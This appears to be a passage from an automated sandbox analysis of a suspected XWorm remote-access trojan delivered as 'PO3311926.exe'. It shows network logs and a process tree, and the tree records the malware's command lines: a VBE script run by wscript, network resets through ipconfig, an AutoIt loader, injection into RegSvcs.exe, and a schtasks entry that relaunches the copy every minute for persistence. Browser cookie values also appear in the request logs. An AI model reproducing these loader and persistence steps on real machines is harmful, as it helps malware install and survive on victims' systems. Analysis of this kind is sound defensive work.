                                                                                            Sec-Fetch-Mode: no-cors
                                                                                            Sec-Fetch-Dest: empty
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                            Cookie: 1P_JAR=2024-04-29-09; NID=513=i4vGxEho67hIbT78H4sdvR3RiGAbuswNQATGLpxg1ZwbZWfPfJEEpO9gKebEs9GpjkyVn_LdpJxbX71dSG1YWSxKprI50Iw_R0SzrRyArmtuuOy3FX2os12m5mg3IOH4454YlQzymsc0wKOKj9gGLzAcNZLcSnF8tYSI_CuAr-Y
                                                                                            2024-04-29 09:36:38 UTC356INHTTP/1.1 429 Too Many Requests
                                                                                            Date: Mon, 29 Apr 2024 09:36:38 GMT
                                                                                            Pragma: no-cache
                                                                                            Expires: Fri, 01 Jan 1990 00:00:00 GMT
                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                            Content-Type: text/html
                                                                                            Server: HTTP server (unknown)
                                                                                            Content-Length: 3111
                                                                                            X-XSS-Protection: 0
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Connection: close
                                                                                            2024-04-29 09:36:38 UTC899INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 73 79 6e 63 2f 6e 65 77 74 61 62 5f 70 72 6f 6d 6f 73 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64
                                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"><meta name="viewport" content="initial-scale=1"><title>https://www.google.com/async/newtab_promos</title></head
                                                                                            2024-04-29 09:36:38 UTC1255INData Raw: 61 63 6b 20 3d 20 66 75 6e 63 74 69 6f 6e 28 72 65 73 70 6f 6e 73 65 29 20 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 61 70 74 63 68 61 2d 66 6f 72 6d 27 29 2e 73 75 62 6d 69 74 28 29 3b 7d 3b 3c 2f 73 63 72 69 70 74 3e 0a 3c 64 69 76 20 69 64 3d 22 72 65 63 61 70 74 63 68 61 22 20 63 6c 61 73 73 3d 22 67 2d 72 65 63 61 70 74 63 68 61 22 20 64 61 74 61 2d 73 69 74 65 6b 65 79 3d 22 36 4c 66 77 75 79 55 54 41 41 41 41 41 4f 41 6d 6f 53 30 66 64 71 69 6a 43 32 50 62 62 64 48 34 6b 6a 71 36 32 59 31 62 22 20 64 61 74 61 2d 63 61 6c 6c 62 61 63 6b 3d 22 73 75 62 6d 69 74 43 61 6c 6c 62 61 63 6b 22 20 64 61 74 61 2d 73 3d 22 32 45 55 35 67 59 53 39 30 39 5a 5a 65 75 30 61 67 43 67 6e 44 68 78 43 4f 32 5a 57 48 56 31 45 62
                                                                                            Data Ascii: ack = function(response) {document.getElementById('captcha-form').submit();};</script><div id="recaptcha" class="g-recaptcha" data-sitekey="6LfwuyUTAAAAAOAmoS0fdqijC2PbbdH4kjq62Y1b" data-callback="submitCallback" data-s="2EU5gYS909ZZeu0agCgnDhxCO2ZWHV1Eb
                                                                                            2024-04-29 09:36:38 UTC957INData Raw: 6f 67 6c 65 20 61 75 74 6f 6d 61 74 69 63 61 6c 6c 79 20 64 65 74 65 63 74 73 20 72 65 71 75 65 73 74 73 20 63 6f 6d 69 6e 67 20 66 72 6f 6d 20 79 6f 75 72 20 63 6f 6d 70 75 74 65 72 20 6e 65 74 77 6f 72 6b 20 77 68 69 63 68 20 61 70 70 65 61 72 20 74 6f 20 62 65 20 69 6e 20 76 69 6f 6c 61 74 69 6f 6e 20 6f 66 20 74 68 65 20 3c 61 20 68 72 65 66 3d 22 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 70 6f 6c 69 63 69 65 73 2f 74 65 72 6d 73 2f 22 3e 54 65 72 6d 73 20 6f 66 20 53 65 72 76 69 63 65 3c 2f 61 3e 2e 20 54 68 65 20 62 6c 6f 63 6b 20 77 69 6c 6c 20 65 78 70 69 72 65 20 73 68 6f 72 74 6c 79 20 61 66 74 65 72 20 74 68 6f 73 65 20 72 65 71 75 65 73 74 73 20 73 74 6f 70 2e 20 20 49 6e 20 74 68 65 20 6d 65 61 6e 74 69 6d 65 2c 20 73 6f 6c 76 69 6e
                                                                                            Data Ascii: ogle automatically detects requests coming from your computer network which appear to be in violation of the <a href="//www.google.com/policies/terms/">Terms of Service</a>. The block will expire shortly after those requests stop. In the meantime, solvin


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            7192.168.2.849721142.250.191.1964436264C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2024-04-29 09:36:38 UTC908OUTGET /sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fhl%3Den-US%26async%3Dfixed:0&hl=en-US&q=EgRRtT5aGKXUvbEGIjDdp0aB_5C1gr2eixUtAMj4mBUQzkJ9vh0Q2d77njF6aqNILXZ84lvrwl1-Gwx1dfsyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1
                                                                                            Host: www.google.com
                                                                                            Connection: keep-alive
                                                                                            X-Client-Data: CIW2yQEIorbJAQipncoBCOj/ygEIkqHLAQiFoM0BCNy9zQEIucrNAQiK080BCMfUzQEIodbNAQio2M0BCPnA1BUYwcvMARi60s0BGMXYzQEY642lFw==
                                                                                            Sec-Fetch-Site: cross-site
                                                                                            Sec-Fetch-Mode: no-cors
                                                                                            Sec-Fetch-Dest: empty
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                            Cookie: 1P_JAR=2024-04-29-09; NID=513=i4vGxEho67hIbT78H4sdvR3RiGAbuswNQATGLpxg1ZwbZWfPfJEEpO9gKebEs9GpjkyVn_LdpJxbX71dSG1YWSxKprI50Iw_R0SzrRyArmtuuOy3FX2os12m5mg3IOH4454YlQzymsc0wKOKj9gGLzAcNZLcSnF8tYSI_CuAr-Y
                                                                                            2024-04-29 09:36:38 UTC356INHTTP/1.1 429 Too Many Requests
                                                                                            Date: Mon, 29 Apr 2024 09:36:38 GMT
                                                                                            Pragma: no-cache
                                                                                            Expires: Fri, 01 Jan 1990 00:00:00 GMT
                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                            Content-Type: text/html
                                                                                            Server: HTTP server (unknown)
                                                                                            Content-Length: 3183
                                                                                            X-XSS-Protection: 0
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Connection: close
                                                                                            2024-04-29 09:36:38 UTC899INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 73 79 6e 63 2f 6e 65 77 74 61 62 5f 6f 67 62 3f 68 6c 3d 65 6e 2d 55 53 26 61 6d 70 3b 61 73 79
                                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"><meta name="viewport" content="initial-scale=1"><title>https://www.google.com/async/newtab_ogb?hl=en-US&amp;asy
                                                                                            2024-04-29 09:36:38 UTC1255INData Raw: 0a 3c 73 63 72 69 70 74 3e 76 61 72 20 73 75 62 6d 69 74 43 61 6c 6c 62 61 63 6b 20 3d 20 66 75 6e 63 74 69 6f 6e 28 72 65 73 70 6f 6e 73 65 29 20 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 61 70 74 63 68 61 2d 66 6f 72 6d 27 29 2e 73 75 62 6d 69 74 28 29 3b 7d 3b 3c 2f 73 63 72 69 70 74 3e 0a 3c 64 69 76 20 69 64 3d 22 72 65 63 61 70 74 63 68 61 22 20 63 6c 61 73 73 3d 22 67 2d 72 65 63 61 70 74 63 68 61 22 20 64 61 74 61 2d 73 69 74 65 6b 65 79 3d 22 36 4c 66 77 75 79 55 54 41 41 41 41 41 4f 41 6d 6f 53 30 66 64 71 69 6a 43 32 50 62 62 64 48 34 6b 6a 71 36 32 59 31 62 22 20 64 61 74 61 2d 63 61 6c 6c 62 61 63 6b 3d 22 73 75 62 6d 69 74 43 61 6c 6c 62 61 63 6b 22 20 64 61 74 61 2d 73 3d 22 6f 56 66 62 75 6b 63 6a 66
                                                                                            Data Ascii: <script>var submitCallback = function(response) {document.getElementById('captcha-form').submit();};</script><div id="recaptcha" class="g-recaptcha" data-sitekey="6LfwuyUTAAAAAOAmoS0fdqijC2PbbdH4kjq62Y1b" data-callback="submitCallback" data-s="oVfbukcjf
                                                                                            2024-04-29 09:36:38 UTC1029INData Raw: 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 65 6d 3b 22 3e 0a 54 68 69 73 20 70 61 67 65 20 61 70 70 65 61 72 73 20 77 68 65 6e 20 47 6f 6f 67 6c 65 20 61 75 74 6f 6d 61 74 69 63 61 6c 6c 79 20 64 65 74 65 63 74 73 20 72 65 71 75 65 73 74 73 20 63 6f 6d 69 6e 67 20 66 72 6f 6d 20 79 6f 75 72 20 63 6f 6d 70 75 74 65 72 20 6e 65 74 77 6f 72 6b 20 77 68 69 63 68 20 61 70 70 65 61 72 20 74 6f 20 62 65 20 69 6e 20 76 69 6f 6c 61 74 69 6f 6e 20 6f 66 20 74 68 65 20 3c 61 20 68 72 65 66 3d 22 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 70 6f 6c 69 63 69 65 73 2f 74 65 72 6d 73 2f 22 3e 54 65 72 6d 73 20 6f 66 20 53 65 72 76 69 63 65 3c 2f 61 3e 2e 20 54 68 65 20 62 6c 6f 63 6b 20 77 69 6c 6c 20 65 78 70 69 72 65 20 73 68 6f 72 74 6c 79 20 61 66 74
                                                                                            Data Ascii: ; line-height:1.4em;">This page appears when Google automatically detects requests coming from your computer network which appear to be in violation of the <a href="//www.google.com/policies/terms/">Terms of Service</a>. The block will expire shortly aft


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            8192.168.2.84972923.221.246.93443
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2024-04-29 09:36:46 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
                                                                                            Connection: Keep-Alive
                                                                                            Accept: */*
                                                                                            Accept-Encoding: identity
                                                                                            User-Agent: Microsoft BITS/7.8
                                                                                            Host: fs.microsoft.com
                                                                                            2024-04-29 09:36:46 UTC466INHTTP/1.1 200 OK
                                                                                            Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                            Content-Type: application/octet-stream
                                                                                            ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                            Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                            Server: ECAcc (chd/073D)
                                                                                            X-CID: 11
                                                                                            X-Ms-ApiVersion: Distribute 1.2
                                                                                            X-Ms-Region: prod-eus-z1
                                                                                            Cache-Control: public, max-age=77222
                                                                                            Date: Mon, 29 Apr 2024 09:36:46 GMT
                                                                                            Connection: close
                                                                                            X-CID: 2


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            9192.168.2.84973023.221.246.93443
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2024-04-29 09:36:47 UTC239OUTGET /fs/windows/config.json HTTP/1.1
                                                                                            Connection: Keep-Alive
                                                                                            Accept: */*
                                                                                            Accept-Encoding: identity
                                                                                            If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                                                                                            Range: bytes=0-2147483646
                                                                                            User-Agent: Microsoft BITS/7.8
                                                                                            Host: fs.microsoft.com
                                                                                            2024-04-29 09:36:47 UTC455INHTTP/1.1 200 OK
                                                                                            ApiVersion: Distribute 1.1
                                                                                            Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                            Content-Type: application/octet-stream
                                                                                            ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                            Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                            Server: ECAcc (chd/0778)
                                                                                            X-CID: 11
                                                                                            Cache-Control: public, max-age=77221
                                                                                            Date: Mon, 29 Apr 2024 09:36:47 GMT
                                                                                            Content-Length: 55
                                                                                            Connection: close
                                                                                            X-CID: 2
                                                                                            2024-04-29 09:36:47 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                                                                                            Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                                                                                            Click to jump to process

                                                                                            Click to jump to process

                                                                                            Click to dive into process behavior distribution

                                                                                            Click to jump to process

                                                                                            Target ID:0
                                                                                            Start time:11:35:21
                                                                                            Start date:29/04/2024
                                                                                            Path:C:\Users\user\Desktop\PO3311926.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Users\user\Desktop\PO3311926.exe"
                                                                                            Imagebase:0xba0000
                                                                                            File size:948'030 bytes
                                                                                            MD5 hash:543E7940DD0AC8E9E42C0120515EC6B6
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:low
                                                                                            Has exited:true

                                                                                            Target ID:2
                                                                                            Start time:11:35:26
                                                                                            Start date:29/04/2024
                                                                                            Path:C:\Windows\SysWOW64\wscript.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\vjpj.vbe"
                                                                                            Imagebase:0x6a0000
                                                                                            File size:147'456 bytes
                                                                                            MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:moderate
                                                                                            Has exited:true

                                                                                            Target ID:3
                                                                                            Start time:11:35:34
                                                                                            Start date:29/04/2024
                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Windows\System32\cmd.exe" /c ipconfig /release
                                                                                            Imagebase:0xa40000
                                                                                            File size:236'544 bytes
                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            Target ID:4
                                                                                            Start time:11:35:34
                                                                                            Start date:29/04/2024
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff6ee680000
                                                                                            File size:862'208 bytes
                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            Target ID:5
                                                                                            Start time:11:35:34
                                                                                            Start date:29/04/2024
                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Windows\System32\cmd.exe" /c sdadbtvsh.bin nngqrvwq.xl
                                                                                            Imagebase:0xa40000
                                                                                            File size:236'544 bytes
                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            Target ID:6
                                                                                            Start time:11:35:34
                                                                                            Start date:29/04/2024
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff6ee680000
                                                                                            File size:862'208 bytes
                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            Target ID:7
                                                                                            Start time:11:35:34
                                                                                            Start date:29/04/2024
                                                                                            Path:C:\Windows\SysWOW64\ipconfig.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:ipconfig /release
                                                                                            Imagebase:0x8f0000
                                                                                            File size:29'184 bytes
                                                                                            MD5 hash:3A3B9A5E00EF6A3F83BF300E2B6B67BB
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:moderate
                                                                                            Has exited:true

                                                                                            Target ID:8
                                                                                            Start time:11:35:34
                                                                                            Start date:29/04/2024
                                                                                            Path:C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:sdadbtvsh.bin nngqrvwq.xl
                                                                                            Imagebase:0x590000
                                                                                            File size:947'288 bytes
                                                                                            MD5 hash:EEAA0F5D82E56659C80FA84D588BF870
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000008.00000003.1557524427.00000000017C4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000008.00000003.1565296596.00000000017FE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000008.00000003.1557460063.00000000017FE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000008.00000003.1565515689.0000000004098000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000008.00000003.1565342745.00000000017AC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                            Antivirus matches:
                                                                                            • Detection: 26%, ReversingLabs
                                                                                            • Detection: 28%, Virustotal, Browse
                                                                                            Reputation:low
                                                                                            Has exited:true

                                                                                            Target ID:9
                                                                                            Start time:11:35:37
                                                                                            Start date:29/04/2024
                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Windows\System32\cmd.exe" /c ipconfig /renew
                                                                                            Imagebase:0xa40000
                                                                                            File size:236'544 bytes
                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            Target ID:10
                                                                                            Start time:11:35:37
                                                                                            Start date:29/04/2024
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff6ee680000
                                                                                            File size:862'208 bytes
                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            Target ID:11
                                                                                            Start time:11:35:37
                                                                                            Start date:29/04/2024
                                                                                            Path:C:\Windows\SysWOW64\ipconfig.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:ipconfig /renew
                                                                                            Imagebase:0x8f0000
                                                                                            File size:29'184 bytes
                                                                                            MD5 hash:3A3B9A5E00EF6A3F83BF300E2B6B67BB
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:moderate
                                                                                            Has exited:true

                                                                                            Target ID:15
                                                                                            Start time:11:35:41
                                                                                            Start date:29/04/2024
                                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                                                                            Imagebase:0xf70000
                                                                                            File size:45'984 bytes
                                                                                            MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:false

                                                                                            Target ID:16
                                                                                            Start time:11:35:45
                                                                                            Start date:29/04/2024
                                                                                            Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Windows\System32\schtasks.exe" /create /sc minute /mo 1 /tn "RegSvcs" /tr "C:\Users\user\AppData\Roaming\RegSvcs.exe"
                                                                                            Imagebase:0x770000
                                                                                            File size:187'904 bytes
                                                                                            MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            Target ID:17
                                                                                            Start time:11:35:45
                                                                                            Start date:29/04/2024
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff6ee680000
                                                                                            File size:862'208 bytes
                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            Target ID:18
                                                                                            Start time:11:35:47
                                                                                            Start date:29/04/2024
                                                                                            Path:C:\Users\user\AppData\Roaming\RegSvcs.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:C:\Users\user\AppData\Roaming\RegSvcs.exe
                                                                                            Imagebase:0xd30000
                                                                                            File size:45'984 bytes
                                                                                            MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                                            Has elevated privileges:false
                                                                                            Has administrator privileges:false
                                                                                            Programmed in:C, C++ or other language
                                                                                            Antivirus matches:
                                                                                            • Detection: 0%, ReversingLabs
                                                                                            • Detection: 0%, Virustotal, Browse
                                                                                            Has exited:true

                                                                                            Target ID:19
                                                                                            Start time:11:35:47
                                                                                            Start date:29/04/2024
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff6ee680000
                                                                                            File size:862'208 bytes
                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                            Has elevated privileges:false
                                                                                            Has administrator privileges:false
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:20
                                                                                            Start time:11:35:50
                                                                                            Start date:29/04/2024
                                                                                            Path:C:\Users\user\wrse\sdadbtvsh.bin.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Users\user\wrse\SDADBT~1.EXE" C:\Users\user\wrse\nngqrvwq.xl
                                                                                            Imagebase:0xa60000
                                                                                            File size:947'288 bytes
                                                                                            MD5 hash:EEAA0F5D82E56659C80FA84D588BF870
                                                                                            Has elevated privileges:false
                                                                                            Has administrator privileges:false
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_AutoitInjector, Description: Yara detected Autoit Injector, Source: 00000014.00000003.1664995772.0000000000DA4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000014.00000003.1702942543.0000000000E83000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000014.00000003.1703000356.00000000037D0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000014.00000003.1693784199.0000000000E7B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000014.00000003.1702531700.0000000000EB8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_AutoitInjector, Description: Yara detected Autoit Injector, Source: 00000014.00000003.1664923329.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000014.00000003.1693739321.0000000000EB8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000014.00000003.1702562774.0000000000E66000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                            Antivirus matches:
                                                                                            • Detection: 26%, ReversingLabs
                                                                                            • Detection: 28%, Virustotal, Browse
                                                                                            Has exited:true

                                                                                            Target ID:21
                                                                                            Start time:11:35:55
                                                                                            Start date:29/04/2024
                                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                                                                            Imagebase:0x70000
                                                                                            File size:45'984 bytes
                                                                                            MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                                            Has elevated privileges:false
                                                                                            Has administrator privileges:false
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000015.00000002.1714503367.0000000000502000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                            Has exited:true

                                                                                            Target ID:22
                                                                                            Start time:11:36:00
                                                                                            Start date:29/04/2024
                                                                                            Path:C:\Users\user\AppData\Roaming\RegSvcs.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Users\user\AppData\Roaming\RegSvcs.exe"
                                                                                            Imagebase:0x240000
                                                                                            File size:45'984 bytes
                                                                                            MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                                            Has elevated privileges:false
                                                                                            Has administrator privileges:false
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:23
                                                                                            Start time:11:36:00
                                                                                            Start date:29/04/2024
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff6ee680000
                                                                                            File size:862'208 bytes
